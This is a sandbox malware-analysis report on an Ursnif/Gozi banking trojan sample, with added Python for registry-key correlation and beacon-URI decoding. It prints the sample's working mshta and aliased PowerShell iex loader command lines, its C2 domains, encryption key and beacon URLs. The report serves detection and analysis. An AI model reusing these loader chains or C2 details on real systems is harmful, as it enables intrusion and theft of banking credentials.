
Windows Analysis Report
main.exe

Overview

General Information

Sample Name: main.exe
Analysis ID: 747122
MD5: 9676298f24c8cdd4b532ac027a00f60e
SHA1: 8d0bd57712533f1a889627706925c17ed4347ce5
SHA256: 0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
Tags: exe

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Machine Learning detection for sample
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • main.exe (PID: 6012 cmdline: C:\Users\user\Desktop\main.exe MD5: 9676298F24C8CDD4B532AC027A00F60E)
  • mshta.exe (PID: 2388 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 2620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Extracted malware configuration (Ursnif):
{
  "RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=",
  "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"],
  "botnet": "5",
  "server": "50",
  "serpent_key": "Qk6vKwBtCjaLJ4zv",
  "sleep_time": "1",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
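The process tree shows the registry-staged loader chain this sample uses: main.exe writes binary and string values under HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E through WMI (the StdRegProv SetBinaryValue/SetStringValue calls listed under System Summary), mshta.exe then evaluates the TestLocal value of that key through WScript.Shell.RegRead, and powershell.exe reads the UrlsReturn value of the same key with gp (the Get-ItemProperty alias) and runs it through iex (Invoke-Expression), both hidden behind freshly created aliases. Neither mshta.exe nor powershell.exe is a child of main.exe in the tree, so the key path is the pivot that ties the stages together. The following Python is an added example, not part of the report or of the malware: it pulls the GUID key and value name out of each command line, flags the mshta and alias tricks, and groups processes by the key they touch. The two malicious command lines are copied from the process tree; the surrounding event records, the PIDs of the benign entries and the benign PowerShell line are constructed.

```python
"""Correlate the mshta.exe and powershell.exe stages of the report's process
tree through the registry key both of them read.  Added example; only the two
malicious command lines are taken from the report."""
import re

MSHTA_CMD = r"""C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"""
PS_CMD = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''

# Constructed process-creation records (the shape a Sysmon event 1 or a 4688
# feed would give you).  PID 4444 is a benign control that must not match.
EVENTS = [
    {"pid": 6012, "image": r"C:\Users\user\Desktop\main.exe",
     "cmdline": r"C:\Users\user\Desktop\main.exe"},
    {"pid": 2388, "image": r"C:\Windows\System32\mshta.exe", "cmdline": MSHTA_CMD},
    {"pid": 2620, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PS_CMD},
    {"pid": 4444, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion"'},
]

# The staging key: a GUID-named subkey under AppDataLow\Software\Microsoft.
# "\\+" tolerates the doubled/tripled backslashes of the JScript string.
KEY_RE = re.compile(
    r"Software\\+AppDataLow\\+Software\\+Microsoft\\+"
    r"([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})"
    r"(?:\\+([A-Za-z0-9_]+))?")
# PowerShell reads the value as a property of the Get-ItemProperty result:
# (gp "HKCU:...\<GUID>").UrlsReturn
PS_PROP_RE = re.compile(r'"\)\s*\.([A-Za-z0-9_]+)')

INDICATORS = {
    "mshta_inline_hta": re.compile(r'mshta(?:\.exe)?"?\s+"?about:<hta:application>', re.I),
    "activex_regread": re.compile(r"\bregread\(", re.I),
    "ps_alias_iex": re.compile(r"new-alias\s+-name\s+\S+\s+-value\s+iex\b", re.I),
    "ps_alias_gp": re.compile(r"new-alias\s+-name\s+\S+\s+-value\s+gp\b", re.I),
    "ps_ascii_getstring": re.compile(r"\[System\.Text\.Encoding\]::ASCII\.GetString", re.I),
}


def analyse(events):
    """Per process: which indicators fired, which GUID key and value it reads."""
    out = []
    for ev in events:
        cmd = ev["cmdline"]
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        guid = value = None
        m = KEY_RE.search(cmd)
        if m:
            guid = m.group(1).upper()
            value = m.group(2)                      # "\TestLocal" style
            if value is None:                       # ").UrlsReturn" style
                pm = PS_PROP_RE.search(cmd, m.end())
                value = pm.group(1) if pm else None
        out.append({"pid": ev["pid"], "image": ev["image"], "hits": hits,
                    "key_guid": guid, "value": value})
    return out


def correlate(findings):
    """Group PIDs by staging key.  The stages are not parent/child in the
    report's tree; sharing the GUID key is what links them."""
    by_key = {}
    for f in findings:
        if f["key_guid"]:
            by_key.setdefault(f["key_guid"], []).append(f["pid"])
    return {k: v for k, v in by_key.items() if len(v) > 1}


if __name__ == "__main__":
    results = analyse(EVENTS)
    for r in results:
        print(r)
    print("shared staging keys:", correlate(results))
```

On a real host the same regexes run over the CommandLine field of process-creation telemetry; the key path is the strongest pivot because the alias names (fuuocwpse, aedsorw) and the GUID change per build, while the AppDataLow\Software\Microsoft\<GUID> layout does not.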
Yara matches in memory dumps (Source | Rule | Description | Author | Strings):

Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security

Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
Strings:
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP

Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_261f5ac5 | Description: unknown | Author: unknown
Strings:
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\

Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security

Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
Strings:
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP

Further memory-dump matches are collapsed in the original report (38 entries) and are not reproduced here.
Yara matches in unpacked PE images (Source | Rule | Description | Author):

Source: 0.2.main.exe.6d0000.1.unpack | Rule: JoeSecurity_Ursnif_1 | Description: Yara detected Ursnif | Author: Joe Security
Source: 0.2.main.exe.cb94a0.2.raw.unpack | Rule: JoeSecurity_Ursnif_1 | Description: Yara detected Ursnif | Author: Joe Security
Source: 0.3.main.exe.14294a0.1.unpack | Rule: JoeSecurity_Ursnif_1 | Description: Yara detected Ursnif | Author: Joe Security
Source: 0.3.main.exe.1455948.2.unpack | Rule: JoeSecurity_Ursnif_1 | Description: Yara detected Ursnif | Author: Joe Security
Source: 0.3.main.exe.13aa4a0.0.unpack | Rule: JoeSecurity_Ursnif_1 | Description: Yara detected Ursnif | Author: Joe Security

Further unpacked-PE matches are collapsed in the original report (3 entries) and are not reproduced here.
                No Sigma rule has matched
Snort IDS alerts:

Timestamp: 11/16/22-02:14:48.026105 | SID: 2033203 | Source: 192.168.2.3:49698 | Destination: 134.0.118.203:80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 11/16/22-02:14:48.026105 | SID: 2033204 | Source: 192.168.2.3:49698 | Destination: 134.0.118.203:80 | Protocol: TCP | Classtype: A Network Trojan was detected


                AV Detection

Source: main.exe | VirusTotal: Detection: 61%
Source: main.exe | Avira: detected
Source: main.exe | Joe Sandbox ML: detected
Source: 0.2.main.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.0.main.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: main.exe | Malware Configuration Extractor: Ursnif {"RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "5", "server": "50", "serpent_key": "Qk6vKwBtCjaLJ4zv", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_006D47E5
Source: main.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                Networking

Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49698 -> 134.0.118.203:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49698 -> 134.0.118.203:80
Source: Joe Sandbox View | ASN Name: AS-REGRU AS-REGRU
Source: global traffic | HTTP traffic detected:
  GET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: iujdhsndjfks.ru
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: iujdhsndjfks.ru
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: iujdhsndjfks.ru
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: powershell.exe, 0000000F.00000002.527605554.00000265C03F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/
Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT
Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH
Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS
Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | DNS traffic detected: queries for: lentaphoto.at
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,0_2_006D4F4B
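The three beacon requests above carry the bot's check-in data in the URI path rather than in a body or query string, which is what the two Snort signatures (URI Struct M1 (_2B) and M2 (_2F)) key on. The following Python is an added example, not code from the report or from the malware: it undoes the URI encoding and returns the still-encrypted payload. The encoding rules it applies are an assumption drawn from the paths shown here: standard base64 with "/" written as _2F and "+" as _2B, padding dropped, slashes inserted at arbitrary offsets (the third request has one landing inside a token, n5k_/2B4), a fixed leading directory (uploaded) and a decoy extension (.pct). Decrypting the result would need the Serpent-CBC key from the extracted configuration (serpent_key) and is not attempted here; the encoder in the block is only there so the decoder can be round-trip tested on constructed data.

```python
"""Normalise Ursnif/Gozi beacon URIs back to the raw (still encrypted) blob.
Added example; the encoding rules are an assumption drawn from the URIs in
this report and the Snort rule names, not from the malware's own code."""
import base64
import re

# The three GET paths from the report's HTTP traffic (Host: iujdhsndjfks.ru).
BEACON_PATHS = [
    "/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct",
    "/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct",
    "/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct",
]

# Escape tokens the bot substitutes for the two base64 characters that are
# not URL-safe.  The Snort signatures in this report key on exactly these.
TOKENS = {"_2F": "/", "_2B": "+"}
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]*")


def ursnif_uri_to_blob(path: str) -> bytes:
    """Drop directory, slashes and extension, undo the token substitution,
    re-add base64 padding and decode.  Raises ValueError on anything that
    does not fit the scheme, so it is safe to run over a whole proxy log."""
    path = path.split("?", 1)[0]
    segments = [s for s in path.split("/") if s]
    if len(segments) < 2:
        raise ValueError(f"expected /<dir>/<data...>: {path!r}")
    segments[-1] = segments[-1].rsplit(".", 1)[0]    # drop the decoy extension
    # Slashes are inserted at arbitrary offsets, even inside a token
    # ("...n5k_/2B4..." in the third URI), so join first, substitute second.
    joined = "".join(segments[1:])                   # segments[0] is the directory
    for token, ch in TOKENS.items():
        joined = joined.replace(token, ch)
    if not B64_ALPHABET.fullmatch(joined):
        raise ValueError(f"non-base64 characters remain: {joined!r}")
    if len(joined) % 4 == 1:
        raise ValueError("length cannot be valid base64")
    joined += "=" * (-len(joined) % 4)               # padding was stripped
    return base64.b64decode(joined)


def blob_to_ursnif_uri(blob: bytes, directory: str = "uploaded",
                       ext: str = "pct", chunk: int = 13) -> str:
    """Inverse of the above, constructed here for round-trip testing.  The
    chunking deliberately ignores token boundaries so a slash can land
    inside _2F/_2B, as it does in the report's third request."""
    enc = base64.b64encode(blob).decode().rstrip("=")
    enc = enc.replace("/", "_2F").replace("+", "_2B")
    parts = [enc[i:i + chunk] for i in range(0, len(enc), chunk)]
    return f"/{directory}/" + "/".join(parts) + f".{ext}"


def summarise(paths=BEACON_PATHS):
    """(decoded length, 16-byte aligned) per URI.  A CBC block cipher such as
    the Serpent named in the extracted config yields 16-byte multiples."""
    out = []
    for p in paths:
        blob = ursnif_uri_to_blob(p)
        out.append((len(blob), len(blob) % 16 == 0))
    return out


if __name__ == "__main__":
    for (n, aligned), p in zip(summarise(), BEACON_PATHS):
        print(f"{n:4d} bytes, 16-byte aligned={aligned}: {p[:48]}...")
```

All three paths decode to 208 bytes, a multiple of the 16-byte Serpent block, which is the sanity check worth applying before spending time on decryption. Substituting tokens before removing the slashes is the usual mistake: the split token in the third request then survives as a stray underscore and the base64 step fails.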

                Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
Source: Yara match | File source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: main.exe, 00000000.00000002.505909636.0000000000788000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

Source: Yara match | File sources: the same 24 memory dumps and unpacked PE images listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_006D47E5

                System Summary

                barindex
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
